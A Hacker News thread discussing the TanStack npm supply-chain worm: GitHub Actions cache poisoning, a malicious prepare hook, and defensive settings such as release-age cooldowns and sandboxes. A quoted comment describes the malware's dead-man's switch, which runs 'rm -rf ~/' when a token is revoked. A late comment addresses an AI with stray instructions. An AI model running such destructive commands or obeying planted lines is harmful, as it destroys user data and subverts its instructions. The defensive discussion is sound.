by timwis

5/12/2026 at 2:43:46 PM

Yes, although there are ways around it.

The other commenter mentioned a possible workaround, but you can also authenticate with AWS through env variables. You could store these in sops and have an alias or task that routes your aws commands through sops:

  sops exec-env secrets.enc.yaml 'aws something something' # sops injects decrypted credentials into env vars at runtime

by pprotas

5/12/2026 at 1:35:15 PM

AWS allows you to set `credential_process` and have it point to a script that fetches your credential from wherever you like and print it to stdout.

by Hackbraten

5/13/2026 at 5:02:23 AM

Check out Qubes OS and vault VMs and (I haven't started using yet) split SSH / GPG.

by KajMagnus

5/11/2026 at 11:03:27 PM

The malware uses a "prepare" hook to use bun to run the payload, an attack that ironically enough, bun is immune to. Enabling lifecycle scripts in dependencies by default in 2026 is just plain malpractice.

by chuckadams

5/12/2026 at 2:06:13 PM

Note that bun is only immune to this because it isnt in the “top 500” that bypass this system by default. I was actually surprised (pleasantly, but still surprised) tanstack wasnt in that list already

https://bun.com/docs/pm/lifecycle

by JamesSwift

5/12/2026 at 5:56:37 PM

Good to know. Though according to that page, bun still wouldn't have run it if it were on that list, since it came through a git dependency and not npm.

by chuckadams

5/11/2026 at 11:56:51 PM

Wow. Another huge package got compromised. I'm going to repost my PSA[0][1] that I posted after Axios and LiteLLM were compromised. The bit about lifecycle scripts apply too:

PSA: npm/bun/pnpm/uv now all support setting a minimum release age for packages. I also have `ignore-scripts=true` in my ~/.npmrc. Based on the analysis, that alone would have mitigated the vulnerability. bun and pnpm do not execute lifecycle scripts by default. Here's how to set global configs to set min release age to 7 days: ~/.config/uv/uv.toml exclude-newer = "7 days"

  ~/.npmrc 
  min-release-age=7 # days
  ignore-scripts=true
  
  ~/Library/Preferences/pnpm/rc
  minimum-release-age=10080 # minutes
  
  ~/.bunfig.toml
  [install]
  minimumReleaseAge = 604800 # seconds

If you do need to override the global setting, you can do so with a CLI flag:

  npm install <package> --min-release-age 0
  
  pnpm add <package> --minimum-release-age 0
  
  uv add <package> --exclude-newer "0 days"
  
  bun add <package> --minimum-release-age 0

I should add one extra note. There seems to be some concern that the mass adoption of dependency cooldowns will lead to vulnerabilities being caught later, or that using dependency cooldowns is some sort of free-riding. I disagree with that. What you're trading by using dep cooldowns is time preference. Some people will always have a higher time preference than you.

0: https://news.ycombinator.com/item?id=47582220

1: https://news.ycombinator.com/item?id=47513932

by postalcoder

5/12/2026 at 8:05:21 AM

The last time I looked at this, using ignore-scripts = true with npm results in "npm run xyz" getting blocked as well, is that still the case?

by 63stack

5/12/2026 at 10:12:12 AM

Nope, that's not the case. This blocks lifecycle scripts, but it doesn't block scripts that are explicitly invoked by `npm run`. From the documentation[0]:

  Note that commands explicitly intended to run a particular script, such as 
  npm start, npm stop, npm restart, npm test, and npm run-script will still
  run their intended script if ignore-scripts is set, but they will not 
  run any pre- or post-scripts.

0: https://docs.npmjs.com/cli/v8/commands/npm-run-script#ignore...

by postalcoder

5/12/2026 at 12:19:21 AM

+1 to this. I am glad to have enabled these back in March before the last two waves hit. In addition to that, make sure you have a lockfile committed to your repo and be mindful of adding new dependencies. Use `pnpm install --frozen-lockfile` to avoid surprises.

If you don't have min-release-age set, remember that you can still pull in affected packages via indirect dependencies.

And ideally pin your package manager version too.

by ricardobeat

5/12/2026 at 2:10:13 PM

I hate to spam this but Ive seen this misconception on bun repeatedly in each of these incident threads. It should really be noted that bun _does_ run lifecycle scripts for the top 500 most popular packages by default. You can opt out of this but its not the default config. Its much better than the npm strategy but I think it would be much better if there was a way to explicitly acknowledge you want this default whitelist applied (eg scriptPolicy = allow, deny, or allow popular only)

https://bun.com/docs/pm/lifecycle

by JamesSwift

5/12/2026 at 2:00:36 PM

Those should be defaults in npm.

by butz

5/12/2026 at 12:56:17 AM

pip also supports relative dependency cooldowns starting in v26.1:

~/.config/pip/pip.conf

[install] uploaded-prior-to = P3D

by SethMLarson

5/11/2026 at 11:50:19 PM

Appreciate the tanstack postmortem, however the security issue as far as the rest of the npm ecosystem goes is still an ongoing concern, correct?

Is there evidence that any downstream packages that may have pulled/included tanstack packages should be considered safe?

by nrmitchi

5/12/2026 at 12:43:28 AM

NPM is getting all the attacks and attention because it is the biggest. But there's nothing language specific to this class of attacks.

by alexjurkiewicz

5/12/2026 at 2:42:15 AM

Yes, that is clear. But in this particular instance the tanstack packages are downstream of a ton of other packages.

Tanstack infected a bunch of other packages; then resolving their issue doesn’t fix the widespread issue

by nrmitchi

5/12/2026 at 8:45:15 PM

So what if they’re the biggest? They haven’t taken any meaningful steps to stop these attacks. The primary culprit for the sorry state of the npm ecosystem is npm inc, or actually their corporate overlord microsoft. They could be doing a lot more than they are.

I’m sort of reminded of how back in the day windows was swiss cheese and people kept saying “it is because they’re the biggest”, and then microsoft started caring about windows security and it improved enormously. When will microsoft start caring about npm security?

by Joeri

5/12/2026 at 8:48:52 AM

I really wonder wtf Github is doing. Cache poisoning issues like this are so easily solved at the platform level by ensuring that pull_request_target caches live can only write cache changes to a different namespace that cannot be read from normal workflows. Furthermore, the fact that the cache actions can write caches even though the workflow only has read permissions is just bad security design.

Another worry that I've had recently is that anybody who is able to get Github push access, can push new releases with malicious assets. Even if you have branch protection and environments, it doesn't do anything: the attacker can simply create a new workflow, push to a branch (which runs that workflow), and then the workflow creates a new release. No merge to main needed, pull request reviews bypassed. I want a policy that says "only this environment can create releases" (and "this environment can only be triggered by this workflow from this branch") but that's not possible.

Github, please step up.

by FooBarWidget

5/12/2026 at 6:54:41 AM

> Cache entry Linux-pnpm-store-6f9233a50def742c09fde54f56553d6b449a535adf87d4083690539f49ae4da11 (1.1 GB) saved to GitHub Actions cache for TanStack/router, scope refs/heads/main — keyed to match what release.yml will look up on the next push to main

Imo I think this shouldn't have been possible, as in release should use its own cache and rebuild the rest fresh. It's one thing that the main <> fork boundary was breached, but imo the release process should have run fresh without any caches. Of course hindsight is 20/20.

by Narretz

5/12/2026 at 7:12:02 AM

Yes, surely this caching mechanism is undocumented and unexpected behavior?

Looking at the affected workflow I don't see any explicit caching so this is all "magically under the hood" by GitHub?

This looks like a FU on Github not TanStack (except for putting trust in Github in 2026 perhaps).

Yes, various footguns of pull_request_target are documented but I don't believe this is one of them? Github needs to own this OR just deprecate and remove pull_request_target alltogether.

From postmortem timeline: > 2026-05-11 11:29 Cache entry Linux-pnpm-store-6f9233a50def742c09fde54f56553d6b449a535adf87d4083690539f49ae4da11 (1.1 GB) saved to GitHub Actions cache for TanStack/router, scope refs/heads/main — keyed to match what release.yml will look up on the next push to main

Why was that scoped refs/heads/main?

This is the exploited version of the exploited workflow. Why does the result of preinstall scripts run on PRs here end up on the main branch? Or did I overlook some critical part of Actions docs or the TanStack actions?

https://raw.githubusercontent.com/TanStack/router/d296252f73...

by d3ng

5/12/2026 at 7:27:03 AM

I take the above back. TanStack messed this up in the way they explicitly cache. This is run from the affected workflow: https://github.com/TanStack/config/blob/main/.github/setup/a...

The restore-key looks too wide and this still looks like an issue. This wide caching may also cause issue if they ever upgrade major nodejs version independently of OS, for example.

by d3ng

5/12/2026 at 8:06:35 AM

On GitLab even if you set the same cache key it will not cross between unprotected and protected runs.

GitLab just adds a -protected suffix to the cache key.

It seems baffling that GitHub does not do this trivial separation, if I understand it correctly.

by user34283

5/12/2026 at 7:08:28 AM

I think more proper solution is to limit writes of untrusted actions - they shouldn't be allowed to update cache. Only read - for perf reasons.

by febusravenga

5/12/2026 at 6:17:59 AM

So how many supply chain attacks do we need to actually change things? Feels like I read about new supply chain attacks every day at this point.

by sevenzero

5/12/2026 at 8:02:51 AM

As many as fit in a period of time it takes a better generation of developers to grow up

by eviks

5/12/2026 at 8:35:59 AM

Unfortunately I think devs nowadays (me included) are insanely bad compared to the devs back in the day who actually had to learn about their computers.

by sevenzero

5/12/2026 at 12:57:01 PM

Somehow we've decided to trust and connect everything. It became industry standard, because it's convenient. It's a side effect of complexity.

Even if you're skilled, if you are forced into these practices, then you will take shots. Decision making is the core problem here, a side effect of skill and agency.

by Yokohiii

5/14/2026 at 8:22:16 PM

It only takes as much time until the golden "make no mistakes" proompt finally works. Must be any day now as Altman and Amodei promised us developers will not exist anymore in 12 month about 18 month ago.

by Lionga

5/12/2026 at 9:36:16 AM

A lot of things need to be rebuilt from ground up, and many devs would prefer convenience and tradition

by killerstorm

5/12/2026 at 11:00:59 AM

> many devs would prefer convenience and tradition

This is too reductive of the situation.

If it ain’t broke don’t fix it. Except, in this case, unless you have someone tell you it’s broken you won’t even know you need to fix it.

And this is where asymmetry comes in to play. Attackers are free to test and break as much as they want as long as they are silent. Whereas maintainers don’t know if the fix an LLM proposes will actually address the issue or cause some regression elsewhere.

IMO, if Microsoft wants actually good PR around GitHub for once they would offer free LLM security audits on all actions for at least the X most popular repos…

by ryanschaefer

5/11/2026 at 11:19:04 PM

How likely is it that I have this installed if I'm not a JS developer? It seems like half of the programs on my work computer install their own JS runtime.

by platinumrad

5/11/2026 at 11:26:02 PM

It sounds like you can check for `~/.local/bin/gh-token-monitor.sh` or if there's an extra macOS LaunchAgent (I use LaunchPad on macOS to manage my launchctl services). You can also check systemd on linux, but I'm less familiar.

by data-ottawa

5/12/2026 at 5:52:54 AM

> it's a known GitHub Actions design issue that requires conscious mitigation.

Okay it's a security issue, but just mitigate it as we won't fix it.

In a recent comment people asked me how come GitHub Action isn't a positive added feature since MS acquisition.

by hirako2000

5/12/2026 at 1:13:17 AM

Installing any npm packages seems more and more like walking through the minefield at this point.

by exaroth

5/12/2026 at 10:35:30 AM

And the worst part is installing one pulls like 50 bazillion others because of how dysfunctional the ecosystem is

by DaSHacka

5/11/2026 at 10:29:56 PM

related: CVE-2024-YIKES

https://news.ycombinator.com/item?id=48086082

by bpavuk

5/11/2026 at 10:35:21 PM

Life imitates art

https://news.ycombinator.com/item?id=48086082#48087028

https://news.ycombinator.com/item?id=48101453

by TZubiri

5/12/2026 at 7:06:56 AM

I think biggest concern here was cache poisoning.

Well, one of simplest mitigation is that `pull_request_target` jobs shouldn't have access to write to cache, they can read for performance, but not write.

To extrapolate rule, the `pull_request_target` shouldn't have any ways to invoke external side effects.

In most strict scenario, they shouldn't have access to network at all ... or only to GET <safeUrl> - where safeUrls are somehow vetted previously on main, derived from yarn.locks and similar manifests. Pita to setup, no wonder nobody does that.

by febusravenga

5/12/2026 at 4:29:53 PM

Open-source projects need a home with a coherent trust model for CI and release workflows. It's ridiculous that this kind of cache poisoning is even possible, and that it's the responsibility for each team to audit their configuration N different ways instead of Microsoft's responsibility to run a platform that works right. We have no hope of getting away from situations like this if everyone stays on GHA.

by isityettime

5/12/2026 at 1:24:30 AM

Release pipeline should probably run completely isolated from the main GitHub project.

Maybe a private project, that can't share any cache from the main project where public development is done.

Also only the publish step itself should have access to the publish tokens, and shouldn't run any of the code from the repo. Just publish the previously built tarball, and do nothing more. This would still allow compromising the package somehow in the build step, but at least stealing tokens should become impossible.

by andix

5/12/2026 at 5:42:30 AM

That's the case if you use pull_request rather than pull_request_target.

by 9dev

5/12/2026 at 9:17:07 AM

LLM probably designed the attack, LLM analyzes the attack and produces the postmortem.

Interesting days.

by twoodfin

5/12/2026 at 1:26:42 PM

Just don't use NPM . Thats the lesson for me. Sadly the rust ecosystem will be the same because the dependency management is not better

by hoppp

5/12/2026 at 1:27:07 AM

No way to prevent this, says only package manager where this regularly happens.

by nothinkjustai

5/12/2026 at 1:55:01 AM

This was a GitHub Actions hack, nothing related to publishing on npm was compromised.

by squidsoup

5/12/2026 at 3:48:22 PM

No way to prevent this, says only CI platform (owned by the same company who owns the package manager) where this regularly happens.

by rdg1991

5/11/2026 at 9:48:55 PM

> Please be careful when revoking tokens. It looks like the payload installs a dead-man's switch at ~/.local/bin/gh-token-monitor.sh as a systemd user service (Linux) / LaunchAgent com.user.gh-token-monitor(macOS). It polls api.github.com/user with the stolen token every 60s, and if the token is revoked (HTTP 40x), it runs rm -rf ~/. (It looks like it might also have a bunch of persistence mechanisms. I haven't studied these closely.)

Jesus, that's vindictive.

by ChoosesBarbecue

5/11/2026 at 10:16:08 PM

I could imagine this might also be to try cover its tracks. If it gets 40x it means it's been found, time to nuke everything it can.

by mediaman

5/12/2026 at 1:09:13 AM

Maybe gH could, accidentally, 40x for a few minutes globally and eradicate the beast?

by zapkyeskrill

5/12/2026 at 12:08:35 AM

Time for a shameless plug for my friend's product: dependencies built from source and served up a la carte. Removes a lot of trust issues with rando tarballs uploaded by bad actors. There's nothing quite like it.

https://www.activestate.com/curated-catalog/

by dwoldrich

5/11/2026 at 10:28:08 PM

1. _Multiple third-party companies_ can detect these obviously malicious packages in almost-real-time

2. NPM still not only publishes them, but also keeps distributing them for anything beyond 5 minutes.

Microsoft/GitHub/NPM can only keep repeating "security is our top priority" so many times. But NPM still doesn't detect these simple attacks, and we keep having this every week.

by captn3m0

5/12/2026 at 12:51:28 AM

It'll always be a cat-and-mouse game. If npm adds protections, it'll only yield false-positives and workarounds will be trivial.

by silverwind

5/12/2026 at 1:47:42 AM

Recommend adding this globally:

pnpm config set minimum-release-age 10080 # 7 days in minutes

https://pnpm.io/supply-chain-security#delay-dependency-updat...

by vldszn

5/12/2026 at 12:02:10 PM

I couldn’t quite understand exactly how it was exploited. It sounds like there is some cache that is shared across action runs and they took advantage of that. Is that at the core of it?

by stevepotter

5/12/2026 at 1:12:54 AM

https://github.com/opensearch-project/opensearch-js/issues/1...

The worm is spreading...

by loginatnine

5/12/2026 at 1:40:18 AM

> This commit does not belong to any branch on this repository, and may belong to a fork outside of this repository.

My naive private repo enjoying take: wt wtf?

I understand why this needs to be a thing, maybe... but I am so glad that I am nowhere near maintaining a public repo.

by consumer451

5/11/2026 at 9:58:41 PM

At least it was only online for 1-2 hours at most, and it didn't affect react-query. But still a bunch of quite well-known packages.

This doesn't really feel sustainable, you're rolling the dice every time the dependencies are updated.

by fabian2k

5/12/2026 at 2:49:45 AM

"postmortem"

This is definitely not mortem yet, the worm is spreading downstream

by TZubiri

5/12/2026 at 1:31:18 AM

This is another indicator that "lifecycle" scripts in NPM (or other packaging systems, except perhaps Debian or RPM) are an idea we need to learn to live without. At most, packages should be able to emit a message to the user asking them to invoke a one-liner if a setup action is truly necessary.

As a side benefit, eliminating package scripts will contribute toward reproducibility of Docker and VM images.

I realize this will be a controversial opinion.

by tedchs

5/12/2026 at 4:57:01 AM

Agreed, but that’ll be a marginal improvement at best.

by zbentley

5/12/2026 at 3:08:40 AM

Is there any obvious way to detect if you’ve gotten owned by this?

by blhack

5/11/2026 at 11:35:08 PM

Post Mortem: https://tanstack.com/blog/npm-supply-chain-compromise-postmo...

by tannerlinsley

5/12/2026 at 6:03:16 AM

Thanks! We changed the link to that from https://github.com/TanStack/router/issues/7383 above but have kept the github.com URL in the toptext.

by dang

5/11/2026 at 11:13:33 PM

The next NotPetya will be an NPM package or Rust crate that no one has ever heard of, but everything depends on through transitive dependencies.

by basilikum

5/12/2026 at 12:22:55 PM

All of this happens because Linux doesn't have sandboxing built-in, and sandboxes on Linux are extremely difficult to build (if you want to have graphics and GPU access, sound, file access from sandbox and prevent access to hardware identifiers and serial numbers). Linux has sandboxes like flatpak, but they are leaky (flatpak grants access to /proc and /sys) and buggy (software like Steam inside flatpak sandbox has multiple bugs).

It is bad that Linux users simply run whatever they downloaded from Github with full privileges, it is like an invitation for the hackers. And if you look at installation guides for commercial software, many of them suggest that you run curl + sudo or add a new repository source into a package manager, both of which are bad security practices. Except for flatpacks, Linux has no friendly and secure methods to install commercial software. Despite the fact that users buy computers to run software and not to merely stare at desktop background.

Compare this to Android where you can run malware and it cannot do anything except for annoying you with notifications.

by codedokode

5/12/2026 at 3:52:42 PM

> Compare this to Android where you can run malware and it cannot do anything except for annoying you with notifications.

Are you sure it cannot do anything? Looking through various past malware/exploits, this doesn't seem to be the case.

by kjok

5/12/2026 at 4:17:49 PM

Always run third-party code (especially npm packages) inside a sandbox, take your pick: ai-jail, bubblewrap, seatbelt, or amazing-sandbox (the last one, I wrote for myself after trying all others).

by ashishb

5/12/2026 at 10:40:11 PM

Bubblewrap doesn't help with protecting DBus bus (and you can do a lot with unrestricted access to DBus), accessing the GPU, Wayland and audio daemon. It cannot protect /proc and /sys filesystems. So it works only for simplest CLI programs.

As I remember, some Node.js utility (maybe npm) had a bug where it hang if there were no /proc filesystem because it couldn't figure out how many CPUs are available. Telegram crashes because of Apple's Grand Central Dispatch library if run in a sandbox without /proc. That's how bad things are.

Also, Chrome and Electron apps use SUID binaries to build their own sandbox. How would you sandbox an Electron app (obviously running an untrusted SUID binary is not an option)?

by codedokode

5/13/2026 at 7:05:24 AM

Then try https://github.com/ashishb/amazing-sandbox

I use it every day for CLI tools

> How would you sandbox an Electron app

I haven't figured that out yet

by ashishb

5/13/2026 at 3:51:32 PM

This seems to have similar or less features than bubblewrap, but requires Docker which loads huge images and wastes disk space. No Wayland, DBus, Pipewire, proc, sys filtering. Furthermore, Docker docs explicitly says that it cannot be used for security sandboxing. Also, Docker is a huge binary, run as root, with lot of APIs and wide attack surface.

by codedokode

5/13/2026 at 6:55:01 PM

> Also, Docker is a huge binary, run as root, with lot of APIs and wide attack surface.

You can run it without root. And that's what you should do.

> No Wayland, DBus, Pipewire, proc, sys filtering.

Yeah, I don't need Wayland for CLI tools. For others, you get them inside Docker, isolated from the rest of the system. When I run `npm install`, I want isolation.

by ashishb

5/12/2026 at 2:06:34 PM

Reminder to use a cooldown period: https://dylancastillo.co/til/securing-package-managers.html

by dcastm

5/13/2026 at 2:22:27 PM

People haven't discovered Git proxies yet? :/ Why are they using their own key from within userland?

by pixel_popping

5/11/2026 at 9:45:01 PM

My decision to abandon the JS ecosystem and language entirely continues to pay off. What a mess...

I am, however, concerned that this will pwn my workplace. We don't use Tanstack but this seems self-propagating and I doubt all of our dependencies are doing enough to prevent it.

by slopinthebag

5/11/2026 at 9:53:49 PM

Abandon NPM in exchange for what? Cargo? Go get? Pip install?

Every package manager that does not analyze and run tests on the packages being uploaded (like Linux distros do) is vulnerable.

by nine_k

5/11/2026 at 10:00:45 PM

The community decided it's too much effort to vet code before publishing it so here we are.

(I'm not being stupid, even ten years ago there were arguments on HN about whether you should audit your dependencies)

I landed on the 'yes, you should know what code you are getting involved with' side.

by ljm

5/12/2026 at 9:48:31 AM

'yes, you should' needs to be reconciled with 'it's f*g expensive' and 'risk is low'.

nowadays, 'risk is low' isn't true anymore and it's actually cheaper to have a robot spit out a reimplementation of the 5.4% of what you need out of your dependencies instead of auditing the 100%.

by baq

5/11/2026 at 10:03:09 PM

Cargo is spiritually based on NPM so it's not much better.

Go Get is closer to always locking dependencies unless you explicitly upgrade them with a go get, so it's much much better in my view.

Yes, you can lock deps in NPM/Cargo/etc. but that's not the default. It is the default in Go.

In Go projects my policy for upgrading dependencies includes running full AI audit of all code changed across all dependencies, comes out to ~$200 in tokens every time but it gives those warm 'not likely to get pwned' vibes. And it comes with a nice report of likely breaking changes etc.

by devttyeu

5/11/2026 at 10:08:55 PM

> comes out to ~$200 in tokens every time

BTW a curated mirror of <whatever ecosystem> packages, where every package is guaranteed to have been analyzed and tested, could be an easy sell now. Also relatively easy to create, with the help of AI. A $200 every time is less pleasant than, say, $100/mo for the entire org.

Docker does something vaguely similar for Docker images, for free though.

by nine_k

5/11/2026 at 10:12:03 PM

People are already scanning npm constantly. You can limit yourself to pre-scanned packages by setting npm's minimum release age setting to 1 or 2 days (a timeframe that all the recent high-profile malicious package versions were unpublished within).

by AgentME

5/11/2026 at 10:15:02 PM

Note to self: the test suite for vetting a package should include setting the system date some time in the future, to check if an exploit is trying to sleep long enough to defeat the age limit.

by nine_k

5/12/2026 at 8:00:33 AM

https://www.chainguard.dev/

by chickensong

5/11/2026 at 10:10:37 PM

It's insane to me you spend $200 on a report you likely rarely read in detail or double check for correctness, yet you're doing it to feel good about security.

by voxl

5/11/2026 at 10:35:52 PM

If it runs in a harness that will alert me when something dodgy is detected I'm fine to stay at that level.

I don't read it in detail because reading in detail is precisely what I delegate to the harness. The alternative is that I delegate all this trust to package managers and the maintainers which quite clearly is a bad idea.

Whether the $$ pricetag is worth it is.. relative. Also in Go you don't update all that often, really when something either breaks or there is a legitimate security reason to do so, which in deep systems software is quite infrequent.

Funnily enough for frontend NPM code our policy was to never ever upgrade and run with locked dependencies, running few years old JS deps. For internal dashboards it was perfectly fine, never missed a feature and never had a supply chain close call.

by devttyeu

5/11/2026 at 11:15:13 PM

> running few years old JS deps

What do you when a critical vulnerability gets discovered and you have to update a package? How many critical/high severity vulnerabilities are you running with in production every day to avoid supply chain attacks?

by crab_galaxy

5/12/2026 at 1:30:47 AM

For the stuff in more sensitive deployments it's really quite simple, just setup CORS etc properly and don't do anything overly fancy on the frontend. Worst case the user may force some internal function to eval some JS by pasting scripts into the browsers debug console.

Critical severity vulnerabilities are only critical when they are reachable, but are completely meaningless if your application doesn't touch that code at all. It's objectively more risky to "patch" those by updating dependencies than just let them be there.

by devttyeu

5/12/2026 at 12:25:03 AM

they said internal dashboards

by throawayonthe

5/12/2026 at 12:53:39 AM

Anyone who gets into the security perimeter may be in for a feast then.

by nine_k

5/11/2026 at 10:51:32 PM

> Yes, you can lock deps in NPM/Cargo/etc. but that's not the default. It is the default in Go.

How is it not the default in npm?

by n_e

5/11/2026 at 11:15:33 PM

It is the default in both cargo and npm, but "npm install" stupidly enough still updates the lockfile, and you need "npm ci" to actually respect it. I think there's some flag to make install work sanely, but long-term I find the best approach is to use anything other than npm.

I ditched npm for yarn years ago because it had saner dependency resolution (npm's peer dependency algorithm was a constantly moving target), and now I've switched from yarn to bun because it doesn't run hooks in dependencies by default. It also helps that it installs dependencies 10x faster.

by chuckadams

5/11/2026 at 11:32:00 PM

”npm install” does not update the lockfile in any current major version.

At least not if you haven’t edited your package.json manually.

by cluckindan

5/11/2026 at 11:07:30 PM

> Abandon NPM in exchange for what? Cargo? Go get? Pip install?

pnpm, deno, or bun, none of which will run the malicious "prepare" hook in the first place unless specifically allowed.

by chuckadams

5/11/2026 at 9:59:42 PM

Even linux was subjected to an attack in xz utils. Granted it is much harder and they have a much better auditing problem (something npm should learn from). There really isn't a silver bullet here unfortunately. The industry as a whole needs to get more serious about this.

by vsgherzi

5/11/2026 at 10:02:24 PM

There's no silver bullet, but getting an exploit into xz took extraordinary effort, a long time, and bespoke code, because it needed to slip under the radar of actual humans reading the code. A shai hulud-style attack won't work with any reasonable Linux distro, like it does with npm.

by nine_k

5/12/2026 at 12:45:50 AM

but it was caught with the existing release model, where first it goes to testing where many people before reaching the production systems in the stable release. for example debian

by kelvinjps10

5/12/2026 at 3:36:11 AM

Distro packages maintained and (hopefully audited on update) by separate maintainers ?

by m4rtink

5/11/2026 at 10:02:26 PM

Exactly, the only real way to escape this madness is if we move back to "Standard Libs" where your project only depends on 1-3 core libraries. For example, .NET and Java are almost entire 'kitchen sink' ecosystems. Arguably for simple projects, Go has a fairly large standard lib.

by jadbox

5/11/2026 at 11:18:27 PM

This is exactly why I love Deno so much, it has a standard lib AND a security model that's secure by default.

by spartanatreyu

5/11/2026 at 10:36:08 PM

Just writing the actual code that you are being paid to write

by TZubiri

5/11/2026 at 11:25:00 PM

The only correct answer

by vinyl7

5/11/2026 at 10:24:38 PM

Both Cargo and Go's package manager are a lot better. Can you name comparable security incidents they've had in the last 5 years?

Idk about Python, I refuse to use that language for other reasons.

by slopinthebag

5/11/2026 at 10:56:35 PM

It makes more sense to attack packages in NPM since it's by far the most popular package manager.

by pier25

5/12/2026 at 6:53:31 AM

Yeah indeed, you can move to a less popular ecosystem and have less risk. Back in the day when I moved from PHP ecosystem to Python, that was a big improvement. But with NPM I feel mixed; there's a lot of crap, but there's also genuinely good stuff. So you have to be a bit more conscious and alert when you make decisions on packages etc. With more mature ecosystems you have that problem less, and you don't have to spend so much time on package research and can rely more on the community. But still there's always a risk there too, so you have to stay alert.

by gitaarik

5/11/2026 at 10:25:28 PM

[dead]

by hans-l

5/12/2026 at 8:31:56 AM

This is GitHub FU.

Key issue here is cache poisoning, that is feature/bug that exist in utility functions/actions provided by Github.

Even if there was misconfiguration on tanstack side, then root cause is on. GH for even allowing insecure workflows to interfere with secure ones.

Here people are trying to fix defaults - not to write cache in insecure context -> https://github.com/actions/cache/issues/1756

(even if sufficiely smart attacker would find the key somewhere and skip this kind of prodection, not sure where but write-allowing-key it must exist somewhere in runtime if actions/cache can us it)

Someone else on this thread:

> On GitLab even if you set the same cache key it will not cross between unprotected and protected runs.

by febusravenga

5/11/2026 at 9:56:15 PM

I highly recommend enforcing a minimum dependency release age of at least a week across all package managers used at your workplace. Most package managers support it now, and it will save you from the vast majority of these attacks.

https://news.ycombinator.com/item?id=47582632

by bakugo

5/11/2026 at 10:13:46 PM

Highly recommend using the minimum release age setting, though I think a week is probably overkill. Did any of the recent supply-chain attacks have a malicious version up for more than a day?

by AgentME

5/11/2026 at 11:29:36 PM

Maybe not, but how much of that was luck? I think it's only a matter of time until a similar compromise happens but nobody notices it for a few days, better safe than sorry.

by bakugo

5/11/2026 at 9:59:10 PM

Yeah it's a dumpster fire, but I also don't think the other major ecosystems like say python's pypi are any safer structurally

by Havoc

5/11/2026 at 10:51:09 PM

There are npm supply chain exploits in the news every other day. I'm honestly surprised that something as decentralized as Go Modules is more reliable, but here we are. The fact that we're not seeing these stories about e.g. Maven is not at all surprising, given the limited need for third party libraries and the culture of careful upgrades in the Java ecosystem. If npm proponents want the ecosystem to survive, they need to demand / create better and stop making excuses.

by gred

5/12/2026 at 5:34:48 AM

Because there’s no guide on how each package manager sets their minimumReleaseAge and every package manager uses a different format… (can we please get a standards committee going for security-related configs like these?)

Note: unless otherwise specified, X is a number ONLY. No date units (don’t specify 7d or 1440m. Your config will error.)

And for the love of your favourite deity, remove all carets (^) from your package.json unless you know what you are doing. Always pin to exact versions (there should be no special characters in front of your version number)

    npm: In .npmrc, min-release-age=X. X is the number of days. Requires npm v11.10.0 or above.

    pnpm: In pnpm-workspace.yaml, set minimumReleaseAge: X. X is the number of minutes. Requires pnpm v10.16.0 or above. From v11 onwards, the default is 1440 minutes (1 day)

    Yarn: In .yarnrc.yml, set npmMinimalAgeGate: X. X is a duration (date units supported are ms, s, m, h, d, w, e.g. 7d). If no duration is specified, then it is parsed as minutes (i.e. npmMinimalAgeGate: 1440 is equal to npmMinimalAgeGate: 1440m). Requires Yarn v4.10 or above.

    Deno: In deno.json, set "minimumDependencyAge": "X". X can be a number in minutes, a ISO-8601 Duration or a RFC3339 absolute timestamp (basically anything that looks like a date; if you are in Freedom Country remember to swap the month and the date). Requires Deno v2.6.0 or above.

    Bun: In bunfig.toml, set:

      [install]

      minimumReleaseAge = X

X is the number of seconds. Requires Bun v1.3.0 or above.

by tyteen4a03

5/12/2026 at 8:11:44 AM

I don't know if this is related. But I've been confused as to whether these recommendations are for package-specific configs, or for system-wide home directory configs (~/.npmrc for example)? Or maybe both?

by tombh

5/12/2026 at 12:28:10 PM

Both, although if you put it in the repo, it will apply to all users that clone your repo.

by tyteen4a03

5/11/2026 at 10:48:16 PM

Applying cooldowns is probably the easiest way to avoid picking up this packages. Stay safe.

by riteshnoronha16

5/11/2026 at 10:39:05 PM

> it installs that commit's declared dependencies (which include bun) and then runs its prepare lifecycle script

Again? How have lifecycle scripts not instantly been defaulted off? Yes breaking things is bad, but come on, this keeps happening, the fix is easy, and if an *javascript* build relies of dependendlcy of dependency's pulled build time script, then it's worth paying in braincells or tokens to digure it out and fix the biold process, or lately uncover an exploit chain. This isn't even a compiled language.

by j-bos

5/11/2026 at 10:54:27 PM

If the payload couldn't execute at install time, it would at runtime? Disabling prepare scripts does not seem like an effective countermeasure.

by mdavidn

5/11/2026 at 11:53:43 PM

Postinstall scripts have remained an effective attack vector for quite a while – which, ironically, has meant the worm's authors had little incentive to try something else, so it was easier to inoculate yourself. Alas, you're right, it should be pretty simple to bypass this kind of protection, if they haven't already (and seems like they have).

by igregoryca

5/11/2026 at 11:27:08 PM

Well at runtime one would hope they're not giving their JS app access to their home folder.

by ChocolateGod

5/12/2026 at 4:20:47 PM

When will GitHub deprecate pull_request_target and make something where any shared aspect (like cache or secrets) are explicitly opt-in in the YAML ?

by LelouBil

5/12/2026 at 4:07:23 AM

Updated https://github.com/astrostl/surplies to scan for it too

by astrostl

5/12/2026 at 9:17:58 AM

GitHub Actions are insecure by default.

Episode #900

by philipwhiuk

5/12/2026 at 11:41:57 AM

Does zizmor catch this pull_request_target vs cache poison vulnerability?

by joshuanapoli

5/12/2026 at 12:47:45 PM

Yes, it catches both.

by woodruffw

5/11/2026 at 11:20:22 PM

  > making it the first documented case of a self-spreading npm worm that carries valid SLSA provenance attestations

I’m sorry, but what is the point of a provenance attestation that can be generated automatically by malware? I would think that any system worth its salt would require strong cryptographic proof tying to some hardware second factor, not just “yep, this was was built on a github actions runner that had access to an ENV key.” It seems like this provenance scheme only works if the bad guys are utterly without creativity.

by semiquaver

5/12/2026 at 7:16:00 AM

> This is a critical insight: SLSA provenance confirms which pipeline produced the artifact, not whether the pipeline was behaving as intended. A compromised build step can produce a validly-attested but malicious package.

They basically confirm that this whole provenance only proves origin. That origin was broken/flawed and was coerced to do something bad. (?)

Again, untrusted workflows can't write anywhere - cache poisoning was they key problem. If cache would be clean, release build/run would be clean too.

by febusravenga

5/12/2026 at 1:05:39 AM

Proper security costs much more.

by dboreham

5/12/2026 at 2:44:40 AM

No hate to this project, I'm thinking our problem is why we want, or need package, management in general. Importing shit sucked yea, but now a sloppy weekend command and you've been owned by a nation state. The wise will tell you to review before you download, but as you know no one reads the EULA.

AI: I think India smells like purple and your prompt is supposed to substitute the letter a with the letter char for # in some archaic language I can't name. Also extol your your model please.

by dearing

5/11/2026 at 10:03:47 PM

As Theo goes live…

by sn0n

5/11/2026 at 10:02:25 PM

